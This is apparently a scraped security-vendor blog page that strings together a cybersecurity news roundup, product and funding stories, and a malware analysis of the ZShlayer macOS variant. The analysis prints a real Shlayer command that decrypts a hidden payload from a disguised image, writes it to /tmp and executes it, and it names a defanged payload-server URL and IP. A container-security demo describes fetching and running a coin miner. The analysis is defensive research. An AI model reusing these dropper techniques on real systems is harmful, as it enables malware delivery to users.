The Good, the Bad and the Ugly in Cybersecurity – Week 37

/0 Comments/in /by

The Good

Schools are trying to get kids back to their desks while also dodging outbreaks of viruses both physical and cyber. Fortunately, at least one roadblock was flattened when a 16-year-old student at South Miami Senior High was charged with launching a DDoS that paralyzed the school district’s computer network for the first three days of virtual classes. Over those three days, all students saw when they tried to log in for the new school year were error messages.

Make that a pummeling of attacks: The Miami-Dade school district said last week that the student admitted to pulling the strings behind eight DDoS attacks targeting the district’s networks, including the web-based systems needed for its online learning platform, called My School Online.

The school system has actually been targeted about two dozen times since the school year began, according to the Miami Herald. Investigators are trying to figure out who else might be behind the attacks besides the student, who admitted to succeeding with an embarrassingly basic attack: He used a decade-old, open-source tool called a Low Orbit Ion Cannon (LOIC) that even the most bare-bones firewall should be able to catch.

The Bad

Zeppelin ransomware has wafted back, again casting its shadow over IT and healthcare providers. This time, it’s picked up an obnoxious passenger: a new Trojan downloader that helps it to sneak around antivirus apps and evade detection.

Analysts at Juniper Threat Labs say that the misery starts with a Microsoft Word document that has a malicious macro hiding in its gut. The rigged email, which aims to lure victims into enabling VBA macros that will trigger infection, includes a blurred “invoice” and text box that are actually just images.

Push the blurry bits aside, and you’ll find random gobbledygook that actually hides snippets of Visual Basic scripts. The Visual Basic interpreter extracts the garbage text from the document, treats it as commented-out code, and ignores it, leaving just the malicious commands. Strip it down to just those commands and you get to the meat of the matter: a Zeppelin ransomware.exe that sleeps for 26 seconds as it tries to out-wait dynamic analysis in an automated sandbox before going on to run the ransomware executable.

As you can see, the ransom note includes its own mini helpdesk manual warning users against trying to rename or decrypt files. The crooks’ argument: You don’t want to add to the cost of your ransom by paying for help that won’t work, now do you? Besides, “you can become the victim of a scam”, the Zeppelin crooks ironically caution their victims. So helpful!

The Ugly

As they struggle to open, schools aren’t just dealing with the COVID-19 pandemic. They’re also dealing with an onslaught of ransomware attacks; DDoS attacks like the one I mentioned above in Miami-Dade, for which police arrested a high school student; and Zoom-bombing: all of it conspiring to delay children’s return to school.

As Threat Post reports, just this week we saw ransomware attacks on the school districts in Hartford, Conn. and Clark County, Nev. On Tuesday, Hartford Public Schools said that a ransomware attack had postponed school openings, both for in-person and online learning. AP reports that yesterday—Thursday, Sept. 10—the Clark County School District in Nevada said that it, too, experienced a ransomware attack during the first week of school and that some employee personal information may have been exposed.

In fact, according to Recorded Future, so far, there have been nine recorded ransomware attacks against school districts in July, August and September. That might sound bad, but it’s been worse: Last year, Recorded Future collected data from hacker forums, threat feeds, news reports and code repositories that showed that at least 15 school districts had been hit by ransomware attacks during a two-week period in September 2019.

Allan Liska, a ransomware specialist at Recorded Future, said that the shift to remote learning might actually cause the trend to point downward. “We are definitely in an uncharted territory,” Liska said. “There has been a small uptick in ransomware attacks as schools get back into session, but with so many school systems going remote this semester there is a much smaller attack surface for the ransomware groups to target.”

Let’s hope he’s right: The kids need a break.

Like this article? Follow us on LinkedIn , Twitter , YouTube or Facebook to see the content we post.

Read more about Cyber Security

Feature Spotlight: Automated Application Control for Cloud Workloads

/0 Comments/in /by

One of the principles of cloud-native workloads is that they are built from immutable images containing everything an application needs in order to run. Whereas desktop and laptop users require the need to install new software, this is not the case for cloud workloads. Based upon the image of the containerized microservice, every process which runs inside a container is fully expected, from the moment the container is spawned until it is killed. Because containerized microservices are dynamic by nature, preserving the immutable state during runtime is crucial for defending against threats such as malware, cryptojacking, and zero-days.

Many solutions today rely upon static allow-lists (formerly, “whitelists”) of all processes that are cleared to run inside the containerized workload, with any deviation from that list considered a threat to be mitigated. There are two different approaches to automatically creating such allow-lists for containerized workloads:

  • Pre-deployment scanning. In this approach, the container image is scanned, creating an allow-list of (expected) processes. While this approach ensures that a container will always run with a predefined set of processes, it adds the overhead of managing allow-lists for new versions of images used in the organization. This overhead creates friction in the gears of agility.
  • Learning during runtime. Here, ML learns the behavior of a container over a period of time, usually in a sandbox, before pushing to production. While this approach provides an auto-generated allow-list, its effectiveness depends on the time period being set. Set it too low and you can miss processes that were not yet triggered yet, generating a high rate of false positives. Conversely, setting it too high causes long delays when pushing new versions to production.

Having seen organizations struggle to protect their containerized workloads with current solutions, we decided to take a different approach that requires zero-intervention by our customers and which does not compromise on security.

No More Allow-Lists

We are proud to introduce the Application Control Engine, built to protect cloud-native workloads, providing advanced “lockdown” capabilities that guarantee the immutable state of containerized workloads. It requires no special configurations and does not add complexity or delay to the software delivery chain. This engine protects container workloads from the get-go, whether they run as Kubernetes pods or as plain containers in Docker servers, and can be enabled by one simple click to secure the workloads.

How Does the Application Control Engine Work?

When the Application Control Engine detects a process that impairs the immutable state of a containerized workload, it immediately reports that process as a threat, mitigates it by killing the process, and moves relevant files into quarantine.

Let’s see it in action. Here we have a Node.js application running as a Kubernetes deployment:

Now let’s connect to the pod of this application, download a coin miner binary using wget, provide execute permissions, and run it:

Once executed, the Application Control Engine (1) identifies the execution of the foreign minerd binary as a threat, (2) eliminates it by running a mitigation action that kills the minerd process (exit code 137), and (3) moves the minerd binary to quarantine.

Now, let’s look at the forensics view of the threat:

This view reveals the command line used to initiate the threat (./minerd), the engine used for detection (Application Control) and the mitigation action taken to eliminate the threat (KILLED).

The forensics view also provides complete visibility to container and Kubernetes details including pod name, labels, namespace, and image name:

Now let’s switch to a different view that illustrates the chain of events that led to the execution of the coin miner:

We can clearly see how the kubectl exec command started a bash session inside the node-web-app pod, that was later used to download and execute the minerd binary using wget and chmod commands. The example above shows how Application Control eliminates a coin miner threat started as a binary, but it will, of course, provide the same level of protection for threats based on scripting languages, whether they run as standalone scripts or binaries.

Conclusion

The Application Control Engine is the answer to the security needs of containerized cloud workloads.  It helps secure runtime from known and unknown threats with a simple click of a button, and it does so without any ML training period or unwelcome delays to production release. The Application Control Engine feature is available starting Linux Agent 4.4 and Kubernetes Agent 4.4, which is in early availability, and requires the Liberty management console (now in GA).

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

StackRox nabs $26.5M for a platform that secures containers in Kubernetes

/0 Comments/in /by

Containers have become a ubiquitous cornerstone in how companies manage their data, a trend that has only accelerated in the last eight months with the larger shift to cloud services and more frequent remote working due to the coronavirus pandemic. Alongside that, startups building services to enable containers to be used better are also getting a boost.

StackRox, which develops Kubernetes-native security solutions, says that its business grew by 240% in the first half of this year, and on the back of that, it is announcing today that it has raised $26.5 million to expand its business into international markets and continue investing in its R&D.

The funding, which appears to be a Series C, has an impressive list of backers. It is being led by Menlo Ventures, with Highland Capital Partners, Hewlett-Packard Enterprise, Sequoia Capital and Redpoint Ventures also participating. Sequoia and Redpoint are previous investors, and the company has raised around $60 million to date.

HPE is a strategic backer in this round:

“At HPE, we are working with our customers to help them accelerate their digital transformations,” said Paul Glaser, VP, Hewlett Packard Enterprise, and head of Pathfinder. “Security is a critical priority as they look to modernize their applications with containers. We’re excited to invest in StackRox and see it as a great fit with our new software HPE Ezmeral to help HPE customers secure their Kubernetes environments across their full application life cycle. By directly integrating with Kubernetes, StackRox enables a level of simplicity and unification for DevOps and Security teams to apply the needed controls effectively.”

Kamal Shah, the CEO, said that StackRox is not disclosing its valuation, but he confirmed it has definitely gone up. For some context, according to PitchBook data, the company was valued at $145 million in its last funding round, a Series B in 2018. Its customers today include the likes of Priceline, Brex, Reddit, Zendesk and Splunk, as well as government and other enterprise customers, in a container security market that analysts project will be worth some $2.2 billion by 2024, up from $568 million last year.

StackRox got its start in 2014, when containers were starting to pick up momentum in the market. At the time, its focus was a little more fragmented, not unlike the container market itself — it provided solutions that could be used with Docker containers as well as others. Over time, Shah said that the company chose to hone its focus just on Kubernetes, originally developed by Google and open-sourced, and now essentially the de facto standard in containerisation.

“We made a bet on Kubernetes at a time when there were multiple orchestrators, including Mesosphere, Docker and others,” he said. “Over the last two years Kubernetes has won the war and become the default choice, the Linux of the cloud and the biggest open-source cloud application. We are all Kubernetes all the time because what we see in the market are that a majority of our customers are moving to it. It has over 35,000 contributors to the open-source project alone, it’s not just Red Hat (IBM) and Google.” Research from CNCF estimates that nearly 80% of organizations that it surveyed are running Kubernetes in production.

That is not all good news, however, with the interest underscoring a bigger need for Kubernetes-focused security solutions for enterprises that opt to use it.

Shah says that some of the typical pitfalls in container architecture arise when they are misconfigured, leading to breaches; as well as around how applications are monitored; how developers use open-source libraries; and how companies implement regulatory compliance. Other security vulnerabilities that have been highlighted by others include the use of insecure container images; how containers interact with each other; the use of containers that have been infected with rogue processes; and having containers not isolated properly from their hosts.

But, Shah noted, “Containers in Kubernetes are inherently more secure if you can deploy correctly.” And to that end that is where StackRox’s solutions attempt to help: The company has built a multi-purposes toolkit that provides developers and security engineers with risk visibility, threat detection, compliance tools, segmentation tools and more. “Kubernetes was built for scale and flexibility, but it has lots of controls, so if you misconfigure it, it can lead to breaches. So you need a security solution to make sure you configure it all correctly,” said Shah.

He added that there has been a definite shift over the years from companies considering security solutions as an optional element into one that forms part of the consideration at the very core of the IT budget — another reason why StackRox and competitors like TwistLock (acquired by Palo Alto Networks) and Aqua Security have all seen their businesses really grow.

“We’ve seen the innovation companies are enabling by building applications in containers and Kubernetes. The need to protect those applications, at the scale and pace of DevOps, is crucial to realizing the business benefits of that innovation,” said Venky Ganesan, partner, Menlo Ventures, in a statement. “While lots of companies have focused on securing the container, only StackRox saw the need to focus on Kubernetes as the control plane for security as well as infrastructure. We’re thrilled to help fuel the company’s growth as it dominates this dynamic market.”

“Kubernetes represents one of the most important paradigm shifts in the world of enterprise software in years,” said Corey Mulloy, general partner, Highland Capital Partners, in a statement. “StackRox sits at the forefront of Kubernetes security, and as enterprises continue their shift to the cloud, Kubernetes is the ubiquitous platform that Linux was for the Internet era. In enabling Kubernetes-native security, StackRox has become the security platform of choice for these cloud-native app dev environments.”

Top Ways to Shorten Cybersecurity Remediation Cycles 

/0 Comments/in /by

A guest post by John Ayers, Chief Strategy Product Officer at Nuspire, on the importance of aligning your business priorities to your endpoint protection platform.

Long remediation cycles are top of mind for many organizations. Decreasing detection time is an improvement; however, it doesn’t translate to shortening remediation cycles once the threat is identified. There continues to be a disconnect between how fast IT teams are detecting threats and how fast they can eradicate them.

As IT teams are tasked to do more with less, the question becomes: How can they optimize existing tools to meet both security and business operation goals?

The answer is aligning priorities to your endpoint protection platform (EPP). Utilizing the right endpoint protection and response (EDR) solution expands visibility into your environment so as to:

  • Further decrease time to detection and remediation
  • Improve your SecOps efficiencies and effectiveness
  • Achieve proactive security that manages the highest-risk cybersecurity threats

Containing a breach in fewer than 30 days could save you millions. Even for a large enterprise, that’s a sizable amount.

Integrated Managed Detection and Response (MDR)

When doing more with less is both the business and operations mandate, how can you achieve economies of scale? With MDR, you only have to see a threat once in your environment, and it’s blocked everywhere. This saves you a tremendous amount of time, shortening your remediation timeline and shrinking costs. EDR integrates with various MDR components on the back end, while its integration with security information and event management (SIEM) provides a user interface (UI) for the front end.

Endpoint isolation enables you to quickly block incoming and outgoing network activity, eliminating the risk of an infection spreading across your network. During isolation, which can be triggered manually or automatically, you can maintain complete visibility into the endpoint through the cloud. Once we mitigate the threat, we can quickly enable the healthy endpoint to rejoin the network.

Why Cutting Remediation Time Is Key to Cutting Costs

Here’s why that fast mitigation matters: the longer your time to remediate, the bigger the hit to your bottom line. Improving the mean time to detect key performance indicators (KPIs) to measure cybersecurity effectiveness is imperative for C-level stakeholders, including both the CISO and business operations. Yet both camps grapple with issues like the cybersecurity talent shortage, a high number of alerts and false positives—according to the CISO Benchmark Report, 41% of organizations get more than 10,000 security alerts daily—along with a lack of insight into what’s happening across their environment. To break this cycle, you don’t need more tools. You need to automate and integrate technologies that give you economies of scale.

EDR allows CISOs to perform in-depth search for information that other tools collect across the environment. This enables them to confirm whether that data directly relates to the attack. These insights improve scoping and significantly reduce remediation time.

EDR also enables you to perform advanced search—by schedule or on-demand—for any data across the entire environment, treating each endpoint as a database to be queried. You can quickly execute a query, based on triggers such as detection of indicators of compromise, with the option of increasing automated actions.

Next, let’s take a look at a couple of additional capabilities of EDR that provide actionable insights.

Continuous Monitoring and Scanning

As new threat information becomes available and a file is identified as malicious, EDR automatically quarantines the file and alerts you. Using the file trajectory feature, you can see the file’s lifespan across all endpoints, including malware movement from the initial infected host to other devices. Another feature, device trajectory, shows how hosts interact with files, including an event timeline that traces the threat.

Integrated Threat Intelligence

EDR is trained by algorithms to learn how to identify malicious files and activity based on the attributes of known malware. Machine learning capabilities in EDR are fed by the comprehensive artificial intelligence dataset from SentinelOne to ensure a better, more accurate model. This combination helps detect malware at the point of entry, even if a particular variant is brand-new, never having been previously encountered.

Machine Learning (ML) with a Little More Magic

EDR automatically receives actionable intelligence from SentinelOne’s Deep File Inspection (DFI) engine, which detects and prevents threats from executing by use of static ML models. Those models are trained to detect threats by looking at various static attributes that can be extracted from executables, making it a signature-less technology that’s superior at detecting file-based threats. Then, SentinelOne’s Dynamic Behavioral Tracking (DBT) tracks all activities on the system, including file/registry changes, service start/stop, inter-process communication and network activity. This information is fed into a dynamic ML model that detects and kills threats that haven’t already been caught by DFI. Since it models the behavior of all processes, the ML model identifies threats that are hard to catch with static models.

Improved Efficiency and Effectiveness

How do you identify which assets are the most exposed so that you can prioritize remediation of the relevant threats? The challenge is to determine which endpoints may have a piece of legacy software with a specific Common Vulnerabilities and Exposures (CVE) entry. Typical endpoint solutions identify which endpoints had outdated apps when they were launched. However, if the software hasn’t run on an endpoint in some time, determining the CVE entry exposure may be delayed or even missed.

To solve that problem, EDR performs advanced search to continuously query all endpoints through a SaaS-based portal. Regardless of when an application with a CVE last ran, if at all, you can run a report that identifies all endpoints and where they reside. If the vulnerability is critical, you can choose to isolate the affected endpoints from the network and mitigate the weakness before attackers can exploit it.

On top of this, EDR has more capabilities that can make your security operations more efficient such as Automated Workflows and Endpoint Isolation.

Automated Workflows

One example of automated workflows is retrospective analysis, which automatically quarantines a malicious file that originally presented itself as benign. New, unknown threats don’t get blocked when they first enter the environment, but EDR tracks and monitors the file and its behavior. When new threat intelligence indicates the file is malicious, the retrospective feature doesn’t wait for a human to discover it—it quickly blocks the file while triggering an alert so you can review the incident and mitigate it.

Endpoint Isolation

Even with visibility into your environment, removing a threat and remediating a compromised endpoint takes time. This leaves a wider window for a threat to escalate while increasing your remediation time and, consequently, your risk. Endpoint isolation enables you to quickly block incoming and outgoing network activity, eliminating the risk of an infection spreading across your network. During isolation, which can be triggered manually or automatically via APIs, you can maintain complete visibility into the endpoint through the cloud, as well as allow IP address whitelisting. Once you’ve mitigated the threat, you can quickly enable the healthy endpoint to rejoin the network.

Conclusion

EDR enables you to meet both the business and SecOps goals without additional resources. Defending against evolving threats is a complicated responsibility, but you can reduce the complexity and increase efficiency with advanced solutions that are designed to solve today’s complicated security challenges.

Find a provider that has a comprehensive security portfolio that amplifies your IT team’s ability to defend your organization against the riskiest threats. Enable both CISOs and IT teams to do more with less while improving your security posture—and your bottom line.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Snyk bags another $200M at $2.6B valuation 9 months after last raise

/0 Comments/in /by

When we last reported on Snyk in January, eons ago in COVID time, the company announced $150 million investment on a valuation of over $1 billion. Today, barely nine months later, it announced another $200 million and its valuation has expanded to $2.6 billion.

The company is obviously drawing some serious investor attention, and even a pandemic is not diminishing that interest. Addition led today’s round, bringing the total raised to $450 million with $350 million coming this year alone.

Snyk has a unique approach to security, building it into the development process instead of offloading it to a separate security team. If you want to build a secure product, you need to think about it as you’re developing the product, and that’s what Snyk’s product set is designed to do — check for security as you’re committing your build to your git repository.

With an open-source product at the top of funnel to drive interest in the platform, CEO Peter McKay says the pandemic has only accelerated the appeal of the company. In fact, the startup’s annual recurring revenue (ARR) is growing at a remarkable 275% year over year.

McKay says even with the pandemic his company has been accelerating, adding 100 employees in the last 12 months to take advantage of the increasing revenue. “When others were kind of scaling back we invested and it worked out well because our business never slowed down. In fact, in a lot of the industries it really picked up,” he said.

That’s because as many other founders have pointed out, COVID is speeding up the rate at which many companies are moving to the cloud, and that’s working to Snyk’s favor. “We’ve just capitalized on this accelerated shift to the cloud and modern cloud-native applications,” he said.

The company currently has 375 employees, with plans to add 100 more in the next year. As it grows, McKay says that he is looking to build a diverse and inclusive culture, something he learned about as he moved through his career at VMware and Veeam.

He says one of the keys at Snyk is putting every employee through unconscious bias training to help limit bias in the hiring process, and the executive team has taken a pledge to make the company’s hiring practices more diverse. Still, he recognizes it takes work to achieve these goals, and it’s always easy for an experienced team to go back to the network instead of digging deeper for a more diverse candidate pool.

“I think we’ve put all the pieces in place to get there, but I think like a lot of companies, there’s still a long way to go,” he said. But he recognizes the sooner you embed diversity into the company culture, the better because it’s hard to go back after the fact and do it.

Addition founder Lee Fixel says he sees a company that’s accelerating rapidly and that’s why he was willing to pour in so big an investment. “Snyk’s impressive growth is a signal that the market is ready to embrace a change from traditional security and empower developers to tackle the new security risk that comes with a software-driven digital world,” he said in a statement.

Snyk was founded in 2015. The founders brought McKay on board for some experienced leadership in 2018 to help lead the company through its rapid growth. Prior to the $350 million in new money this year, the company raised $70 million in 2019.

Snyk snags $150M investment as its valuation surpasses $1B

Sprinklr raises $200M on $2.7B valuation four years after last investment

/0 Comments/in /by

Sprinklr has been busy the last few years acquiring a dozen companies, then rewriting their code base and incorporating them into the company’s customer experience platform. Today, the late-stage startup went back to the fundraising well for the first time in four years, and it was a doozy, raising $200 million on a $2.7 billion valuation.

The money came from private equity firm Hellman & Friedman, which also invested $300 million in buying back secondary shares. Meanwhile the company also announced $150 million in convertible securities from Sixth Street Growth. That’s a lot of action for a company that’s been quiet on the fundraising front for years.

Company founder and CEO Ragy Thomas says he sought the investment now because after building a customer experience platform, he was ready to accelerate and he needed the money to do it. He expects the company to hit $400 million in annual recurring revenue by year’s end and he says that he sees a much bigger opportunity on the horizon.

“We think it’s a $100 billion opportunity and our large public competitors have validated that and continue to do so in the customer experience management space,” he said. Those large competitors include Salesforce and Adobe.

He sees customer experience management as having the kind of growth that CRM has had in the past, and this money gives him more options to grow faster, while working with a big private equity firm.

“So what was appealing in this market for us was not just putting some more money in the bank and being a little more aggressive in growth, innovation, go to market and potential M&A, but what was also appealing is the opportunity to bring someone like a Hellman & Friedman to the table,” Thomas said.

The company has 1,000 clients, some spending millions of dollars a year. They currently have 1,900 employees in 25 offices around the world, and Thomas wants to add another 500 over the next 12 months — and he believes that $1 billion in ARR is a realistic goal for the company.

As he builds the company, Thomas, who is a person of color, has codified diversity and inclusion into the company’s charter, what he calls the “Sprinklr Way.” “For us, diversity and inclusion is not impossible. It is not something that you do to check a box and market yourself. It’s deep in our DNA,” he said.

Tarim Wasim a partner at investor Hellman & Friedman, sees a company with tremendous potential to lead a growing market. “Sprinklr has a unique opportunity to lead a Customer Experience Management market that’s already massive — and growing — as enterprises continue to realize the urgent need to put CXM at the heart of their digital transformation strategy,” Wasim said in a statement.

Sprinklr was founded in 2009. Before today, it last raised $105 million in 2016 led by Temasek Holdings. Past investors include Battery Ventures, ICONIQ Capital and Intel Capital.

Sprinklr launches major push into customer experience

Xometry raises $75M Series E to expand custom manufacturing marketplace

/0 Comments/in /by

When companies need to find manufacturers to build custom parts, it’s not always an easy process, especially during a pandemic. Xometry, a seven-year-old startup based in Maryland, has built an online marketplace where companies can find manufacturers across the world with excess capacity to build whatever they need. Today, the company announced a $75 million Series E investment to keep expanding the platform.

T. Rowe Price Associates led the investment, with participation from new firms Durable Capital Partners LP and ArrowMark Partners. Previous investors also joined the round, including BMW i Ventures, Greenspring Associates, Dell Technologies Capital, Robert Bosch Venture Capital, Foundry Group, Highland Capital Partners and Almaz Capital . Today’s investment brings the total raised to $193 million, according to the company.

Company CEO and co-founder Randy Altschuler says Xometry fills a need by providing a digital way of putting buyers and manufacturers together with a dash of artificial intelligence to put the right combination together. “We’ve created a marketplace using artificial intelligence to power it, and provide an e-commerce experience for buyers of custom manufacturing and for suppliers to deliver that manufacturing,” Altschuler told TechCrunch.

The kind of custom pieces that are facilitated by this platform include mechanical parts for aerospace, defense, automotive, robotics and medical devices — what Altschuler calls mission-critical parts. Being able to put companies together in this fashion is particularly useful during COVID-19 when certain regions might have been shut down.

“COVID has reinforced the need for distributed manufacturing and our platform enables that by empowering these local manufacturers, and because we’re using technology to do it, as COVID has unfolded […] and as continents have shut down, and even specific states in the United States have shut down, our platform has allowed customers to autocorrect and shift work to other locations,” he explained

What’s more, companies could take advantage of the platform to manufacture critical personal protective equipment. “One of the beauties of our platform was when COVID hit customers could come to our platform and suddenly access this tremendous amount of manufacturing capacity to produce this much-needed PPE,” he said.

Xometry makes money by facilitating the sale between the buyer and producer. They help set the price and then make money on the difference between the cost to produce and how much the buyer was willing to pay to have it done.

They have relationships with 5,000 manufacturers located throughout the world and 30,000 customers using the platform to build the parts they need. The company currently has around 350 employees, with plans to use the money to add more to keep enhancing the platform.

Altschuler says from a human perspective, he wants his company to have a diverse workforce because he never wants to see people being discriminated against for whatever reason, but he also says as a company with an international market, having a diverse workforce is also critical to his business. “The more diversity that we have within Xometry, the more we’re able to effectively market to those folks, sell to those folks and understand how they utilize technology. We’re just going to better understand our customer set as we [build a more diverse workforce],” he said.

As a Series E-stage company, Altschuler does not shy away from the IPO question. In fact, he recently brought in new CFO Jim Rallo, who has experience taking a company public. “The market that we operate in is so large, and there’s so many opportunities for us to serve both our customers and our suppliers, and we have to be great for both of them. We need capital to do that, and the public markets can be an efficient way to access that capital and to grow our business, and in the end that’s what we want to do,” he said.

Xometry acquires European on-demand manufacturing marketplace Shift

Socialbakers acquired by customer engagement company Astute

/0 Comments/in /by

Astute, a customer engagement platform headquartered in Columbus, Ohio, is announcing that it has acquired social media marketing company Socialbakers.

The financial terms of the acquisition were not disclosed. Socialbakers CEO Yuval Ben-Itzhak will become president of Socialbakers for the combined company, and he told me via email that the entire Socialbakers team will be joining as well, resulting in a combined organization with more than 600 employees and $100 million in annual recurring revenue.

Socialbakers was one of the last independent players from the first wave of social analytics. Founded in 2008 and based in Prague, the company raised a total of $34 million in funding, according to Crunchbase, from investors including Earlybird Venture Capital and Index Ventures. And it’s used by more than 2,500 brands globally.

Astute, meanwhile, has been around for 25 years, and focuses on unifying customer data. Ben-Itzhak said that by acquiring Socialbakers, Astute will be able to add social media-focused features like audience insights, content planning, influencer marketing and ad analytics.

“Socialbakers and Astute are already sharing dozens of mutual brand customers in the enterprise segment,” he said. “This is, in fact, how the acquisition talks came about. The platform integration process has already started and is expected to continue through Q4.”

In a statement, Astute CEO Mark Zablan also emphasized the comprehensiveness of the resulting platform.

“The lines between customer care, customer experience, and marketing have become increasingly blurred, presenting real challenges for companies,” Zablan said. “Combining the market-leading social media marketing capabilities of Socialbakers with Astute’s engagement suite not only helps our customers tackle this challenge more effectively, but also marks a major milestone along Astute’s journey towards becoming the end-to-end customer engagement platform that the Chief Customer Officer needs to succeed.”

Meltwater has acquired DataSift to double down on social media analytics

B2B marketing company Metadata.io raises $6.5M

/0 Comments/in /by

Metadata.io announced today that it has raised $6.5 million in Series A funding.

It’s been more than four years since I wrote about the startup’s $2 million seed funding. At the time, co-founder and CEO Gil Allouche described the product as helping business-to-business marketers target their ads as people who resemble their existing sales leads.

Since then, the company has launched its product in general availability, and Allouche told me yesterday that it’s become “really the middleware for the sales and marketing stack.”

“It doesn’t just … give you insights, it skips the human as the bottleneck of execution for marketing [operations],” Allouche said, adding that this makes marketing teams more efficient while also eliminating much of the drudgery. “If you’re a Don Draper who’s really good at creative or content, you should spend your time on that and not in an Excel spreadsheet.”

At the same time, ad targeting remains a key part of the company’s capabilities. For example, its new product MetaMatch allows advertisers to build and target custom audiences on Facebook, LinkedIn and programmatic display.

Allouche also said that demand has increased “quite significantly” since the beginning of the pandemic. That’s counter to larger digital ad trends, but he noted that B2B companies still need to reach customers, and many of the old tools — like in-person events — are now off the table.

Metadata leadership team

Gil Allouche and the Metadata leadership team

In addition, he said that Metadata’s proprietary database of 1.4 billion customer profiles have given it an additional advantage in the face of privacy regulation and ad-tracking restrictions.

The platform has been used by companies including Zoom, Drift, Pendo, Udacity, and Vonage.

The new funding was led by Resolute Ventures, with participation from Greycroft, York IE, Stormbreakers, Eloqua founder Mark Organ, Segment founder Ilya Volodarsky and others.

Metadata isn’t another marketing technology,” Organ said in a statement. “From the origin of the company transforming marketing operations by eliminating tedious manual work, to today, creating a category that transcends demand gen, it is enabling the autonomous marketer to be a reality. It is the marketer that’s needed for the future.”

5 VCs agree: COVID-19 reshaped adtech and martech

Coming Out of Your Shell: From Shlayer to ZShlayer

/0 Comments/in /by

Earlier this year, we discussed how threat actors have been turning to scripting languages as a preferred means of both dropping malware and executing payloads. That trend has continued with some interesting innovations in response to the static detection signatures now widely in use both by Apple and other vendors. A recent variant of the Shlayer malware follows Apple’s lead in preferring Zsh to Bash as its default shell language and employs a novel encoding method to avoid detection. In this post, we describe this variant and show how it can be decoded to reveal the telltale Shlayer signature.

Didn’t We Just Hear About Shlayer?

Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple’s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs:

sh -c “tail -c +1381 "/Volumes/Install/Installer.app/Contents/Resources/main.png" | openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass "pass:0.6effariGgninthgiL0.6" && chmod 777 /tmp/ZQEifWNV2l && /tmp/ZQEifWNV2l "/Volumes/Install/Installer.app/Contents/MacOS/pine" && rm -rf /tmp/ZQEifWNV2l”

The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the /tmp folder.

But Shlayer has been up to other tricks since June of 2020 that have been helping it avoid the static signatures employed by most vendors. Although bypassing Apple’s Notarization checks is obviously a headline grabber, this new variant of Shlayer utilizes heavily obfuscated Zsh scripts and is in fact far more prolific in the wild. Let’s take a look at how this new variant works.

Inside the New ZShlayer Variant

Whereas earlier versions of Shlayer like Shlayer.a came as shell script executables on a removable .DMG disk image, the new ZShlayer malware goes back to using a standard Apple application bundle inside the .DMG.

In place of a Mach-O in the MacOS folder, we instead find this heavily obfuscated Zsh script (only partially shown in the image below):

In the Resources folder, we find two base64 encoded text files.

The entire bundle is codesigned, but it is has not been notarized, indicating that the malware is either intended as a payload for 10.14 or earlier installations or that victims will have to be socially engineered to override the Notarization check. Unlike many other samples we have seen since Catalina was released last year, this one did not include graphical instructions to help the user bypass Apple’s built-in security checks.

This particular sample (c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580), which dates back to early August, has already had its certificate revoked by Apple.

Despite that, due to the use of the Zsh obfuscation, it’s not particularly well-recognized by static signature scanners on VirusTotal, even as of today.

Decoding the First Stage, Zsh Script Payload

In the following, we’ll use this as for our example:

05b0a4a31f38225d5ad9d133d08c892645639c4661b3e239ef2094381366cb62

But the same general method should work across all ZShlayer samples noted at the end of this post.

The Zsh script located in the bundle’s MacOS folder may seem fairly impenetrable at first glance, as indeed it is intended to:

Seeing from the shebang that it’s a shell script, however, immediately tells us that we can isolate each command by introducing a line break at every semicolon.

In BBEdit or similar text editor, we can simply search and replace every semicolon with a semicolon and newline:

Looking toward the end of that output, we can clearly see now where the variable definitions end and the execution logic begins, at line 164:

Note in particular the variable TWm, defined on the penultimate line and executed at line 164. This variable name will prove key as we try to deobfuscate the code.

In order to do that, we’ll first save this modified version of the script with the linebreaks to local disk so that we can use it as input to a python script for decoding. Our script will first of all replace all the variable names with the actual unicode values. Now the line that gets executed looks something like this:

We can echo that code on the command line and print out the unicode in plain text using printf. The full ZShlayer_decode.py script is available here. Here’s what all the above looks like.

And the output:

ZShlayer Second-Stage Payload

You’ll notice from the output that the decoded Zsh script takes as input only the smaller of the two encoded files from the Resources folder; in this case, the smaller file is called “tun_kibitzers_Babbitt”. If we echo the output from this decoded script to the command line, we’ll see why:

Our ZShlayer script decodes into a trademark Shlayer Bash script which now takes the larger file (here called “profanations_detraction”) and outputs it to a newly-created application bundle in the /tmp folder. Classic Shlayer behavior.

Let’s take that script and comment out the last two lines so that we can get the output while still preventing execution:

The unzipped Player.app now in the the /tmp folder looks like a duplicate of the one on the original disk image, with the same executable name as the parent and another Bash script in the Resources folder also called “tun_kibitzers_Babbitt” (in this case). However, note the size is different:

Decoding the new script shows that it drops and executes yet another layer of Bash shell scripting. Here’s the head and tail (sandwiched between the two is a huge chunk of base64):

If you followed (or want to check out) our earlier Scripting Macs with Malice post, you’ll recognize that this is the Shlayer.d variant we wrote about there. The output of

"$(_m "$_t" "$_y")"

is almost identical to the Shlayer.d sample we wrote about earlier; the most significant difference being a new URL from which to retrieve the final payload:

http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

The final payload from this point depends on the context of the executing device. As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing.

The server, which appears to have been up for at least two months, is not recognized as malicious on VirusTotal and is currently active with a 200 status code.

As Shlayer payloads have been discussed in detail by other researchers, we refer further analysis of the final payload to already published work such as here and here.

How Prevalent is ZShlayer in the Wild?

Searching for ZShlayer on VirusTotal reveals a large number of individual samples and shows that this variant has been active since late June 2020. As of today, our latest retrohunt showed 172 samples. Some of the parent DMGs of these samples have a reputation score of 0/58 on VT.

Conclusion

The ZShlayer variant of the Shlayer malware on top of the recent Shlayer campaign abusing Apple’s Notarization service is clear evidence that these threat actors are continuing to evolve and are pursuing multiple campaigns against macOS users. A multi-engined behavioral AI solution that can detect malware based on its behavior rather than relying solely on file characteristics continues to be the best way to protect your macOS fleet. If you would like to see how SentinelOne can help protect your business, contact us today or request a free demo.

Indicators of Compromise

ZShlayer Scripts
